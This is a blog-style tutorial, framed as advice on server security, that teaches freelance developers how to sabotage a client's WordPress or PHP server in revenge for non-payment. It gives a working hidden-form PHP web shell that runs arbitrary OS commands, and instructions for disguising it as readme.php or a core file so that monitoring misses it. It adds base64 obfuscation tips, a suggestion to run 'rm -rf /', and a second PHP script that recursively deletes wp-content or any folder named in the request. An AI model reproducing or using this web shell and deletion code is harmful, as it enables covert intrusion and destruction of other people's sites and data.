Keep your server secure from hackers being destroyed using command execution or file execution.

Is the payment related issues with worker suffering you much to destroy your server?

Hello, guys today I will show the process of how a hacker or developer can destroy some one’s server or website if there any problem between them. Besides this, I will show the process of Keep your server secure from hackers being destroyed using command execution or file execution.  But keep in mind that this is only for educational purposes. If you do any harm to anyone using this script then I will not responsible for any kind of occurrence. Also here I will show the process of how to keep your server secure from hackers being destroyed using the command execution.

The reason behind the bad intention of developers to destroy someone’s website using command execution or file execution.

Sometimes the developer from different countries works with various clients. But some bad client does not pay after works.  Also sometimes they want more changes than the contract. So if then the developer does not want to do the changes then the client may not pay him. Also if pay they may give them unexpected ratings like in Fiverr, Upwork, Freelancer, and many online market place. So then the developer or hacker wants to teach them a lesson or hacker intentionally do this. I will show two processes here fully to teach you because of saving you to keep your server secure from hackers being destroyed using command execution or file execution.

If the hacker or developer has the client’s server access or FTP access or may have Cpanel or SSH access. Then the hacker or developer upload this code into his site. So that they may execute it from their browser URL. I mean they must have to upload this script in his/your server.

Ways of keeping your WordPress site safe from hackers being destroyed using command execution or file execution.

Especially today I will show you the process on WordPress to keep your server secure from hackers being destroyed. But this process is not only for WordPress. Bad guys or hackers may use it any site which runs PHP code in its server. Again, it is a PHP code, so the server must need to execute PHP code. Otherwise, these tricks will not work and they will not be able to do any harm you with this script.

They often insert this code in any of the known files which already exist in the server. Because if they add any extra file the web admin or server owner may guesses that like an extra added file and may have a look inside the file. So to avoid the situation they must have to tricky to do this. Also in WordPress, if there you/web admin or server admin installed security plugin, like iThemes Security, Sucuri, Wordfrence, All in one WP security and many more, most of the plugin has file changing detection system.

So if the hacker inserts any extra code into core WordPress file like wp-config.php then the plugin will detect that file changed and it will send a notification to the web administrator. But it never traces the readme.html which located in the root directory of WordPress installation. But the problem is if the hacker adds this code inside the readme.html and access the file through browser URL it will not work for them. Because of the file extension. readme.html is an HTML file and PHP code will not run inside it. So then the hacker or developer needs to either rename it to readme.php or he has to add a PHP file like readme.php. After that, you will learn also how to keep your server secure from hackers being destroyed step by step.

How a hacker can destroy your server and spoil its content using command line execution.

But generally, to be tricky they rename the file instead of adding a new one. Because if there is two readme file then the admin may differ it and it also eye-catching. So better rename the readme.html to readme.php and then insert the shellcode there, this may be different for different hackers. Actually, things matter on human intention and mentality and the ways they think. My purpose here is to teach you how to keep your server secure from hackers being destroyed and save your assets.

Now I am going to show you step by step process of how a hacker can destroy a website or server or WordPress using non-traceable PHP script or shell. This is non-traceable because this is not an automated shellcode like c99.php and I did not encode this script to base64. This is a very simple command execution PHP code. So it can be easily inserted into any code of the existing file.  But my purpose is very simple to show how to keep your server secure from hackers being destroyed using this code. The hacker can use different codes. Hackers generally insert malicious code inside the site by encoding base64 which looks like random text and integer so it is eye-catching.

Non-detectable shell execution simple code in PHP.

Step one: Shell Code:

[php]

<form action=”” method=post style=”display:none”>
Command: <input name=code type=text size=100 value=”<?php if (isset($_POST[“code”])){print(stripslashes($_POST[“code”]));} ?>”>
<input type=submit>
</form>
<pre>
<?php if (isset($_POST[“code”])){system(stripslashes($_POST[“code”]).” 2>&1″);} ?>
</pre>

[/php]

So this is very simple few lines code.  Now you have to run/execute this code through browser URL.

Step Two: Insertion and execution process.

Here now I will show the process of how-to and where they insert and then how they run or execute the code. So for simple making, I will show the process here in my localhost via XAMPP application on windows operating system. But obviously it should work in another operating system like Linux, Mac OS.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

Here I have inserted the code in a separate file.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

We are almost done with the first process of insertion PHP simple shell-code inside the server file. Now we have to run the code from the browser. As here I am using WordPress so then my file access path will be http://localhost/sell/wp-content/themes/cashforcar-wp/init.php because I kept the file into that file under theme folder. If I keep the file into the WordPress installation root directory then my file path will be http://localhost/sell/init.php but as I kept it into that folder lets execute this in our browser URL.

Detect shell-code within the application or server file.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

Here, It is showing a blank page after the execution of the URL. Yes, If you also fetch this then you are also ok. No problem, I kept the code hidden which means I added a CSS property on form tag as display none. That’s why this is not sowing anything. So now you have to make the input form visible and execute code. For doing that right-click anywhere on the blank page and go to Inspect Element of your browser (I am using google chrome browser). This is to make you clear to keep your server secure from hackers being destroyed using this kind of command execution.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

How to display hidden property using inspect element in browser to show shell-code.

After Inspect then click on form tag from the Elements and then see the CSS property. Display none, I added display none because some plugins can find out CSS property as hidden. That’s why I do not recommend using the hidden property. Now just disable the property by clicking on the left tick option of display: none CSS property as shown in the image. So then you will be able to see then from on the page. Thus you can keep your server secure from hackers being destroyed by viewing the hidden property.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

How hackers run non-traceable PHP shell-code using the browser

Now you can run command (Shell or OS command) via this form. As I am using windows OS that’s why  I am going to show you some windows based command here. So let’s execute the directory listing command first to see the files and ( This command will show you all files and folders and subfolders also).

Linux shell-commands to execute inside the server to Keep your server secure from hackers being destroyed

So now type dir /s /b /o:gn and then click on the submit button. It will show you all files and folders. When you will run it in Linux machine then you can use Linux command like mv, rmdir, mkdir, ls, pwd And the most powerful and strong command in Linux or UNIX based OS is sudo rm -rf / or without sudo rm -rf /  . It will destroy the Linux machine. But some server does not allow to execute this code due to security. If you fetch any problem then ask me in the comment section or email me in j4g064ndhu@gmail.com.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

After the execution, it will show the output like the image below.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

Now you can do whatever you like with the OS command. You may create a new file or directory and insert code into that. Again you may delete any file from there and the site will not function properly or damage permanently. It’s now up to you what you want to do with that. Now I am showing the process of mixing this code with base64 encoded and plain text into the readme.php file.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

Then open the readme.php in a code editor and insert the code above of the file. You may use base64 encoding by converting the PHP code to base64 online.

Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

Now you have to call the URL from the browser like http://localhost/sell/readme.php and then it will provide you the same hidden form with some other text on the page. So if the admin runs the readme.php without looking inside the code if the file then he will not able to guess the hidden input box for command execution. After this, you have to inspect and make the form visible then execute the command. I am also giving you another code for the same purpose. But it is a little bit different from this.

Servers file deletion non-encoded PHP shell-code.

[php]

<?php
$file = $_GET[‘file’];

$path = $file ? $file : “wp-content”;

if (file_exists($path)) {
$objects = new RecursiveIteratorIterator (
new RecursiveDirectoryIterator($path),
RecursiveIteratorIterator::SELF_FIRST);
$directories = array(0 => $path);
$files = array();

foreach ($objects as $name => $object) {
if (is_file($name)) {
$files[] = $name;
} elseif (is_dir($name)) {
$directories[] = $name;
}
}

foreach ($files as $file) {
unlink($file);
}

arsort($directories);
foreach ($directories as $directory) {
rmdir($directory);
}
}

[/php]
Keep your server secure from hackers being destroyed

Keep your server secure from hackers being destroyed

So here if you input any specific folder name for the input GET parameter then it will delete that folder and its sub-folders. But if you directly call the URL without parameter then it will delete all files and folders in the wp-content directory. Here wp-email.php file I created and injected my code. I created the file as like WordPress core file. So, see what happens after execution. Be careful during the execution of code on your own computer. If you fetch any difficulties then just ask me in the comments. I will try my best to help you to learn how to keep your server secure from hackers being destroyed.

Here is an another article you may interested which is related to how WordPress site being hacked due to lack of security awareness.